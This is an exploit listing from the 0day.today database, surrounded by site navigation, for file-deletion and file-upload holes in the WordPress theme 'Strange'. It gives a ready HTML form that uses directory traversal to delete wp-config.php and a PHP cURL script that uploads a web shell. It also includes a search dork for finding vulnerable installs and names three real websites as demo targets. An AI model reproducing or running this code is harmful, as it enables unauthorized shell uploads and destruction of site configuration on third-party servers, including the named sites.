0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wordpress Theme Strange File Upload / File Deletion
[Exploit Title : Wordpress Theme Strange File Upload / File Deletion
Exploit Author : NULL_Pointer
Contact : https://www.facebook.com/xenith.gianni
Date : 21/09/2014
Github Mirror : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/ut-strange
Version : 3.1
Google Dork : inurl:/wp-content/themes/ut-strange/
Tested on : Linux, Windows 7
--------------------------------------------------------------
Wordpress Theme Strange have suffers from a File Upload and File Deletion Vulnerability.
1. File Deletion :
This issue allows an attacker to influence calls to the 'unlink()' function and delete arbitrary files. Due to a lack of input validation, an attacker can supply directory traversal sequences followed by an arbitrary file name to delete specific files.
Exploit Code (HTML) :
<form action="http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" method="POST">
<input type="hidden" name="action" value="deletefile">
<input type="text" name="file" value="../../../wp-config.php">
<input type="submit" value="Delete It">
</form>
2. File Upload :
Exploit Code (PHP) :
<?php
if (!isset ($argv[1], $argv[2]))
die ("Usage : php {$argv[0]} http://127.0.0.1/ my_shell.php");
if (!file_exists ($argv[2]))
die ("Fatal Error : File \"{$argv[2]}\" Not Found...\n");
$post = array
(
"file_upload" => "@".$argv[2],
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ($argv[1]."/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
Shell Path : http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/[SHELL_NAME]
Demo Sites :
http://www.estudio34.com
http://www.argela.com
http://www.gcntv.net
Proof Video : http://www.youtube.com/watch?v=eVHITnvYjqs
# 0day.today [2024-11-15] #